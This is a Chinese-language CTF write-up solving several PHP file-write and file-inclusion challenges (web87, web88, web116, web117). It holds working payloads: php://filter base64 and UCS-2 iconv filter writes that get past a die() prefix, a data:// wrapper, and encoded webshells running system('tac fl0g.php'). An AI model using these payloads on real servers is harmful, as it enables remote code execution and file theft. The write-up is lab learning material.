web87
神奇这道题我写了一个小时终于写好了
file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);:整个函数调用的作用是将解码后的 file 作为目标文件路径,然后将前面定义的终止执行提示语句与 content 的内容拼接起来,一起写入到目标文件中。
意思是要进行url解码然后再写文件 并且要绕过死亡(file_put_content)
content是写入内容,要进行base64编码 ,而base解码时,是4个一组,flag.php(要写入的文件),写入的内容<?php die('大佬别秀了');?>,只有phpdie会参与base64解码,因为phpdie只有6个字节,补两个a就是8字节了再与我们写的命令内容进行拼接
构造payload
php
/?file=php://filter/write=convert.base64-decode/resource=1.php两次URL编码(浏览器(hackbar)一次,题目绕过一次)为
php
?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30(工具用的bp的编码器,这个编码器我找了好久好久)
php
<?php system('ls');?>进行base64编码
PD9waHAgc3lzdGVtKCdscycpOz8+POST传参content=aaPD9waHAgc3lzdGVtKCdscycpOz8+
然后查看fl0g.php
php
<?php system('tac fl0g.php');?>PD9waHAgc3lzdGVtKCd0YWMgZmwwZy5waHAnKTs/Pg==
php
content=aaPD9waHAgc3lzdGVtKCd0YWMgZmwwZy5waHAnKTs/Pg==
web88
php伪协议进行绕过(但是编码的时候必须绕过=和+)
欧克了这样子就没有了
php
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/PnNz
web116
是一个视频利用winhex分离源码(我还没下载具体步骤后面补充)
这里借图一用
正则匹配但是最后一句file_get_content($file);直接打开file这个文件
php
?file=flag.php抓包发送
到手
web117
用php伪协议绕过但是常见的编码都被过滤这里有一种新的编码
iconv.UCS-2LE.UCS-2BE编码就是把每两位字符换位。
php
?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=1.php编码脚本
python
str = "<?=system('tac f*');"
str_encoded = ''
for i in range(len(str)):
if i % 2 == 1:
str_encoded += str[i]
str_encoded += str[i-1]
print(str_encoded) # ?<s=syet(mt'caf '*;)
php
content=?<s=syet(mt'caf '*;)
然后访问1.php
到手